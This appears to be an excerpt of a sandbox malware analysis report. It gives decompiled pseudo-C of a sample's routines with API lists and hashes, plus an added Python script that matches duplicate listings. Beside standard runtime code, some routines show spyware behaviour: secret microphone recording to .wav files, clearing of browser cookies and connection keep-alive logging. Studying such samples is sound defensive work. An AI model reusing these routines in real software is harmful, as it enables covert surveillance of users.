                    								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *( *_t96) = 0;
                    								} else {
                    									( *_t96)[0x3f] = 0;
                    								}
                    								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *(_t96[1]) = 0;
                    								} else {
                    									_t96[1][0x3f] = 0;
                    								}
                    							}
                    							// Publish the three values through the CRT accessors for the timezone offset, the daylight flag and the DST bias.
                    							 *(E004428C7()) = _v8;
                    							 *(E004428BB()) = _v12;
                    							_t61 = E004428C1();
                    							 *_t61 = _v16;
                    							return _t61;
                    						}
                    					}
                    				}
                    			}
                    Instruction address column for the listing above (one entry per statement, flattened by extraction): 0x00442e63 to 0x00442fb2 for E00442E63 itself and 0x00442fb3 to 0x0044309d for the routine the decompiler appended after it, both in the 0x00400000 image; 0x00000000 entries are goto lines with no instruction of their own.

                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 00442ECD
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00442F45
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00442F72
                    • _free.LIBCMT ref: 00442EBB
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                    • _free.LIBCMT ref: 00443087
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: ~0D
                    • API String ID: 1286116820-265891634
                    • Opcode ID: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
                    • Instruction ID: eaddca497d2d59ffe78ea95fbf6017cfb6659b3e69c1b97070d3f8b181497d44
                    • Opcode Fuzzy Hash: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
                    • Instruction Fuzzy Hash: A8512871900209EBEB10EF65DD819AEB7BCEF40315B90027FF414D3291E7B89E859B99
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			// Console write helper from the statically linked CRT (the same routine as E00444B6E below). _a8 is a CRT file
                    			// descriptor: the handle table at 0x46b800 holds blocks of 64 entries of 0x30 bytes, with the OS handle at +0x18,
                    			// a flag byte at +0x2d (bit 0x04 = a DBCS lead byte saved from the previous call) and that byte at +0x2e. Each
                    			// byte of _a12[0.._a16) is widened, re-encoded in the console code page (GetConsoleCP) and written with WriteFile;
                    			// after every 0x0a byte a 0x0d is written as well. _a4 receives {last error, bytes consumed plus CRs added, CRs added}.
                    			// Although this copy sits at 0x105D59DC it still references 0x46a00c (stack cookie) and 0x46b800 in the 0x00400000
                    			// image, consistent with the 0x10590000 region being an unrelocated second copy of the same PE.
                    			E105D59DC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t116;
                    				signed int _t118;
                    				signed char _t123;
                    				signed char _t128;
                    				intOrPtr _t129;
                    				signed int _t131;
                    				signed char* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    
                    				_v8 =  *0x46a00c ^ _t136;
                    				_t80 = _a8;
                    				_t118 = _t80 >> 6;
                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                    				_t133 = _a12;
                    				_v52 = _t133;
                    				_v48 = _t118;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
                    				_v40 = _a16 + _t133;
                    				_t86 = GetConsoleCP();
                    				_t135 = _a4;
                    				_v60 = _t86;
                    				 *_t135 = 0;
                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                    				while(_t133 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t133;
                    					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
                    					_t123 =  *(_t129 + _t116 + 0x2d);
                    					if((_t123 & 0x00000004) == 0) {
                    						// No pending lead byte. 0x8000 in the ctype table entry for this byte is _LEADBYTE, i.e. a DBCS lead byte:
                    						// if it is the last byte of the buffer it is stashed at +0x2e for the next call, otherwise the pair is converted.
                    						if(( *(E105D0213(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t133);
                    							goto L8;
                    						} else {
                    							if(_t133 >= _v40) {
                    								_t131 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                    								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    							} else {
                    								_t112 = E105D449E( &_v28, _t133, 2);
                    								_t137 = _t137 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t133 =  &(_t133[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t128 = _t123 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                    						_push(2);
                    						_v15 = _t128;
                    						 *(_t129 + _t116 + 0x2d) = _t128;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E105D449E();
                    						_t137 = _t137 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t133 =  &(_t133[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t135 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133; // bytes consumed + CRs added
                    									if(_v36 >= _v56) {
                    										// Newline translation: if the source byte was 0x0a, write a 0x0d after it and count it.
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E105C0B89(_v8 ^ _t136);
                    			}
                    Instruction address column for the listing above (one entry per statement, flattened by extraction): 0x105d59eb to 0x105d5b8e in the 0x10590000 region; 0x00000000 entries are goto lines with no instruction of their own.

                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,105D6151,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 105D5A1E
                    • __fassign.LIBCMT ref: 105D5A99
                    • __fassign.LIBCMT ref: 105D5AB4
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 105D5ADA
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,105D6151,00000000,?,?,?,?,?,?,?,?,?,105D6151,?), ref: 105D5AF9
                    • WriteFile.KERNEL32(?,?,00000001,105D6151,00000000,?,?,?,?,?,?,?,?,?,105D6151,?), ref: 105D5B32
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 105b5f2bad96c86c2a1aea1fecdd32ae43e7a6c00a2812d1e525031561599e8b
                    • Instruction ID: d827c3e8cb07e52e4d832b077e6708d385457dda52130806afdbef769c506573
                    • Opcode Fuzzy Hash: 105b5f2bad96c86c2a1aea1fecdd32ae43e7a6c00a2812d1e525031561599e8b
                    • Instruction Fuzzy Hash: FE519371900349AFDB00CFA8D885AEEBBF8EF09355F14416BE556E7351E770A940CB61
                    Uniqueness Score: -1.00%

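The E105D59DC listing above and E00444B6E, which follows, are one CRT routine dumped from two memory regions; they differ only in callee IDs and in how the decompiler rendered the stack-cookie load (one statement versus two). Triage is faster when such twins are matched automatically instead of read twice. The script below is an added example, not part of the Joe Sandbox report or of the sample: it normalises pseudo-C in the report's style (function IDs, address-sized literals, _tNN/_vNN temporaries) and matches listings exactly by hash or approximately by line similarity. SAMPLES contains short constructed prologue excerpts modelled on E105D59DC, E00444B6E and E00442E63, not the full listings.

```python
"""Spot the same decompiled routine appearing in several memory regions.

Added example for this report; not Joe Sandbox code. Normalises pseudo-C in
the report's style so that two copies of one routine at different bases match
exactly (fingerprint) or approximately (similarity). SAMPLES are constructed
prologue excerpts modelled on this page's listings, not complete functions.
"""
from __future__ import annotations

import difflib
import hashlib
import re

FUNC_ID = re.compile(r"\bE[0-9A-F]{8}\b")   # decompiler function IDs (E00444B6E)
HEX = re.compile(r"\b0x[0-9a-fA-F]+\b")     # hex literals
TEMP = re.compile(r"\b_[tv]\d+\b")          # _tNN temporaries, _vNN locals


def normalise(listing: str) -> list[str]:
    """Canonical lines: callee IDs -> CALL, address-sized literals -> ADDR,
    small immediates kept (0x3f, 0x8000, 0x2d carry meaning), temporaries -> T,
    locals -> V, comments and blank lines dropped, whitespace collapsed."""
    out: list[str] = []
    for raw in listing.splitlines():
        line = raw.split("//", 1)[0].strip()
        if not line:
            continue
        line = FUNC_ID.sub("CALL", line)
        line = HEX.sub(lambda m: "ADDR" if int(m.group(0), 16) >= 0x10000
                       else m.group(0).lower(), line)
        line = TEMP.sub(lambda m: m.group(0)[1].upper(), line)
        out.append(re.sub(r"\s+", " ", line))
    return out


def fingerprint(listing: str) -> str:
    """Exact-match key: identical routines at different bases hash the same."""
    return hashlib.sha256("\n".join(normalise(listing)).encode()).hexdigest()


def similarity(a: str, b: str) -> float:
    """Line-level ratio in [0, 1]; catches copies where the decompiler rendered
    one statement differently, which defeats the exact fingerprint."""
    return difflib.SequenceMatcher(None, normalise(a), normalise(b),
                                   autojunk=False).ratio()


def find_duplicates(listings: dict[str, str],
                    threshold: float = 0.85) -> list[tuple[str, str, float]]:
    """All pairs that are exact (1.0) or near (>= threshold) duplicates."""
    names = sorted(listings)
    found: list[tuple[str, str, float]] = []
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            if fingerprint(listings[a]) == fingerprint(listings[b]):
                found.append((a, b, 1.0))
                continue
            ratio = similarity(listings[a], listings[b])
            if ratio >= threshold:
                found.append((a, b, ratio))
    return found


# Constructed excerpts (prologues only) in the report's pseudo-C style.
SAMPLES: dict[str, str] = {
    "E105D59DC": """
_v8 =  *0x46a00c ^ _t136;
_t80 = _a8;
_t118 = _t80 >> 6;
_t116 = (_t80 & 0x0000003f) * 0x30;
_t133 = _a12;
_v52 = _t133;
_v48 = _t118;
_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
_v40 = _a16 + _t133;
_t86 = GetConsoleCP();
_t135 = _a4;
_v60 = _t86;
 *_t135 = 0;
_t112 = E105D449E( &_v28, _t133, 2);
""",
    "E00444B6E": """
_t78 =  *0x46a00c; // 0xee31ea10
_v8 = _t78 ^ _t136;
_t80 = _a8;
_t118 = _t80 >> 6;
_t116 = (_t80 & 0x0000003f) * 0x30;
_t133 = _a12;
_v52 = _t133;
_v48 = _t118;
_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
_v40 = _a16 + _t133;
_t86 = GetConsoleCP();
_t135 = _a4;
_v60 = _t86;
 *_t135 = 0;
_t112 = E00443630( &_v28, _t133, 2);
""",
    "E00442E63": """
_t96 = E004428CD();
_v8 = 0;
_v12 = 0;
_v16 = 0;
_t36 = E0044292B( &_v8);
""",
}

if __name__ == "__main__":
    for a, b, ratio in find_duplicates(SAMPLES):
        print(f"{a} ~ {b}: {ratio:.3f}")
```

Run on the samples, the exact fingerprints of the E105D59DC and E00444B6E excerpts differ because of the split cookie load, while their line similarity is about 0.9 and the E00442E63 excerpt scores 0. Address-sized literals are masked but small immediates are kept on purpose: 0x3f, 0x8000 and 0x2d are what distinguish this routine from other CRT loops, and masking them would collapse unrelated functions together.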
                    C-Code - Quality: 73%
                    			// The same CRT console write helper as E105D59DC above, here at its home address in the 0x00400000 image; the
                    			// only differences are the callee IDs and the decompiler splitting the stack-cookie load into two statements.
                    			E00444B6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				signed int _t78;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t116;
                    				signed int _t118;
                    				signed char _t123;
                    				signed char _t128;
                    				intOrPtr _t129;
                    				signed int _t131;
                    				signed char* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    
                    				_t78 =  *0x46a00c; // 0xee31ea10
                    				_v8 = _t78 ^ _t136;
                    				_t80 = _a8;
                    				_t118 = _t80 >> 6;
                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                    				_t133 = _a12;
                    				_v52 = _t133;
                    				_v48 = _t118;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
                    				_v40 = _a16 + _t133;
                    				_t86 = GetConsoleCP();
                    				_t135 = _a4;
                    				_v60 = _t86;
                    				 *_t135 = 0;
                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                    				while(_t133 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t133;
                    					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
                    					_t123 =  *(_t129 + _t116 + 0x2d);
                    					if((_t123 & 0x00000004) == 0) {
                    						if(( *(E0043F3A5(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t133);
                    							goto L8;
                    						} else {
                    							if(_t133 >= _v40) {
                    								_t131 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                    								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    							} else {
                    								_t112 = E00443630( &_v28, _t133, 2);
                    								_t137 = _t137 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t133 =  &(_t133[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t128 = _t123 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                    						_push(2);
                    						_v15 = _t128;
                    						 *(_t129 + _t116 + 0x2d) = _t128;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E00443630();
                    						_t137 = _t137 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t133 =  &(_t133[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t135 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                    									if(_v36 >= _v56) {
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E0042FD1B(_v8 ^ _t136);
                    			}

                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004452E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00444BB0
                    • __fassign.LIBCMT ref: 00444C2B
                    • __fassign.LIBCMT ref: 00444C46
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00444C6C
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444C8B
                    • WriteFile.KERNEL32(?,?,00000001,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444CC4
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
                    • Instruction ID: e328608ab5ff3e249bba56c64f9ea87ddb18b4882b1b7872db0bfde0b7a2e7dd
                    • Opcode Fuzzy Hash: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
                    • Instruction Fuzzy Hash: 4051B1B0E00249AFEB10CFA8D885BEEBBB8EF49304F14416BE555E7251E7349941CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00404FAD(void* __edi, intOrPtr _a4) {
                    				struct _SYSTEMTIME _v24;
                    				char _v48;
                    				char _v72;
                    				void* __ebx;
                    				intOrPtr _t85;
                    				void* _t86;
                    				void* _t92;
                    
                    				_t84 = __edi;
                    				if( *0x46c7d0 == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t85 = _a4;
                    				if( *0x46bb03 == 0) {
                    					L7:
                    					 *0x46c7e0 =  *0x46c7e0 & 0x00000000;
                    					 *0x46c7e5 = 1;
                    					 *0x46c7dc = _t85;
                    					return 1;
                    				}
                    				_t91 =  *0x46c7e4;
                    				_t62 = "%02i:%02i:%02i:%03i [Info] ";
                    				if( *0x46c7e4 != 0) {
                    					GetLocalTime( &_v24);
                    					_push(_v24.wMilliseconds & 0x0000ffff);
                    					_push(_v24.wSecond & 0x0000ffff);
                    					_push(_v24.wMinute & 0x0000ffff);
                    					E0040482E(_t91, E00401F95(E00405343(_t62,  &_v48, E00402084("%02i:%02i:%02i:%03i [Info] ",  &_v72, _t62), __edi, _t91, "Connection KeepAlive enabled\n")), _v24.wHour & 0x0000ffff);
                    					E00401FC7();
                    					E00401FC7();
                    					_push(_t85);
                    					_push(_v24.wMilliseconds & 0x0000ffff);
                    					_push(_v24.wSecond & 0x0000ffff);
                    					_push(_v24.wMinute & 0x0000ffff);
                    					E0040482E(_t91, E00401F95(E00405343(_t62,  &_v72, E00402084(_t62,  &_v48, _t62), __edi, _t91, "Connection KeepAlive timeout: %i\n")), _v24.wHour & 0x0000ffff);
                    					_t86 = _t86 + 0x2c;
                    					E00401FC7();
                    					E00401FC7();
                    					 *0x46c7e4 = 0;
                    				}
                    				_t92 =  *0x46c7dc - _t85; // 0x14
                    				if(_t92 != 0) {
                    					_t93 =  *0x46c7e5;
                    					if( *0x46c7e5 != 0) {
                    						GetLocalTime( &_v24);
                    						_push(_t85);
                    						_push(_v24.wMilliseconds & 0x0000ffff);
                    						_push(_v24.wSecond & 0x0000ffff);
                    						_push(_v24.wMinute & 0x0000ffff);
                    						E0040482E(_t93, E00401F95(E00405343(_t62,  &_v72, E00402084(_t62,  &_v48, _t62), _t84, _t93, "KeepAlive timeout changed to %i\n")), _v24.wHour & 0x0000ffff);
                    						E00401FC7();
                    						E00401FC7();
                    					}
                    				}
                    				goto L7;
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(004125A4,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004125A4), ref: 00404FE8
                    • GetLocalTime.KERNEL32(004125A4,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004125A4), ref: 004050A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
                    • API String ID: 481472006-2341810981
                    • Opcode ID: 7c94642c56f54362cdbb9c4c99b137a64ebdc9c89d517faa3ec81877cd7e2248
                    • Instruction ID: 31cc8708638748cc17bd93e98780a7eb41637df7a957a61141d383218a0d845e
                    • Opcode Fuzzy Hash: 7c94642c56f54362cdbb9c4c99b137a64ebdc9c89d517faa3ec81877cd7e2248
                    • Instruction Fuzzy Hash: 3B418762C00249AACB10F7A6D945AFFB7B8DB04309F10447BF941B60D2FB7C5A45DB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401CEF(void* __ebx, void* __edi, intOrPtr _a8) {
                    				char _v84;
                    				char _v112;
                    				void* _v116;
                    				char _v136;
                    				void* _v140;
                    				char _v160;
                    				void* _v164;
                    				char _v184;
                    				void* _v188;
                    				char _v204;
                    				char _v208;
                    				void* _v212;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				void* __esi;
                    				void* _t29;
                    				intOrPtr _t43;
                    				void* _t75;
                    
                    				_t47 = __ebx;
                    				_push(_t75);
                    				E00401F6D(__ebx,  &_v228);
                    				_t82 = _a8 - 0x3c0;
                    				if(_a8 == 0x3c0) {
                    					E004016F0();
                    					E004356B9( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016E8());
                    					E00402084(__ebx,  &_v204,  &_v84);
                    					_t29 = E004172DA( &_v112,  &_v208);
                    					E00401EFA( &_v232, _t31, _t75, E004030A6(_t47,  &_v184, E00403030( &_v160, E00402FFA(__ebx,  &_v136, 0x46c0e0, 0x5c), _t29), __edi, _t82, L".wav"));
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    					E00401FC7();
                    					E00401A64(E00401EEB( &_v236), 0x46ba78);
                    					waveInUnprepareHeader( *0x46bab0, 0x46ba78, 0x20);
                    					0x46ba78->lpData = E00401F95(0x46c0f8);
                    					_t43 =  *0x46bab4; // 0x0
                    					 *0x46ba7c = _t43;
                    					 *0x46ba80 = 0;
                    					 *0x46ba84 = 0;
                    					 *0x46ba88 = 0;
                    					 *0x46ba8c = 0;
                    					waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
                    					waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
                    				}
                    				return E00401EF0();
                    			}

                    APIs
                    • _strftime.LIBCMT ref: 00401D34
                      • Part of subcall function 00401A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
                    • waveInUnprepareHeader.WINMM(0046BA78,00000020,00000000,?), ref: 00401DE6
                    • waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401E24
                    • waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401E33
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID: %Y-%m-%d %H.%M$.wav
                    • API String ID: 3809562944-3597965672
                    • Opcode ID: d3c10e846ecb8bea2605fde4a25610dab3d001097f6f1d0d1a9824d8bc590c67
                    • Instruction ID: b95cf381b91ee3eea6b14a1bea0ab522a1d9d58dbc3f8f0b685b08f1e50e51ff
                    • Opcode Fuzzy Hash: d3c10e846ecb8bea2605fde4a25610dab3d001097f6f1d0d1a9824d8bc590c67
                    • Instruction Fuzzy Hash: 7131C2311043409BC314EF61DC46AAE77A9EB54308F00443EF85AA65F2FF789A49CB9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0040A409(void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v340;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t17;
                    				void* _t20;
                    				int _t34;
                    				void* _t40;
                    				void* _t41;
                    				char* _t42;
                    				void* _t48;
                    				char* _t55;
                    				void* _t59;
                    				void* _t61;
                    				void* _t62;
                    
                    				_t42 =  &_v28;
                    				E004020D5(_t40, _t42);
                    				_push(_t42);
                    				_t41 = 0;
                    				_t17 = E004108E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                    				_t62 = _t61 + 0xc;
                    				E00401FD1( &_v28, 0x80000001, _t59, _t17);
                    				E00401FC7();
                    				_t58 = 0x45f6bc;
                    				_t20 = E00405A6F(0x45f6bc);
                    				_t66 = _t20;
                    				if(_t20 == 0) {
                    					ExpandEnvironmentStringsA(E00401F95( &_v28),  &_v340, 0x104);
                    					__eflags = PathFileExistsA( &_v340);
                    					if(__eflags == 0) {
                    						goto L1;
                    					} else {
                    						E00402084(0,  &_v52,  &_v340);
                    						_t58 =  &_v52;
                    						_t34 = E00417754(E00401EEB(E004172DA( &_v76,  &_v52)));
                    						E00401EF0();
                    						_t55 =  &_v52;
                    						E00401FC7();
                    						__eflags = _t34;
                    						if(__eflags == 0) {
                    							_push(_t55);
                    							_push(_t55);
                    							__eflags = E0040A713();
                    							if(__eflags != 0) {
                    								_t41 = 1;
                    								E00402084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
                    								E0040A6EF(1,  &_v52, __eflags);
                    								goto L8;
                    							}
                    						} else {
                    							_t48 = _t62 - 0x18;
                    							_push("\n[IE cookies cleared!]");
                    							goto L2;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t48 = _t62 - 0x18;
                    					_push("\n[IE cookies not found]");
                    					L2:
                    					E00402084(_t41, _t48);
                    					E0040A6EF(_t41, _t58, _t66);
                    					_t41 = 1;
                    					L8:
                    				}
                    				E00401FC7();
                    				return _t41;
                    			}

                    APIs
                      • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                      • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                      • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                    • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    • API String ID: 1133728706-4073444585
                    • Opcode ID: 724a0fe27f4f6489b78bfe97240ea4b5cf9d33245695f08732568f9e26d24ae0
                    • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
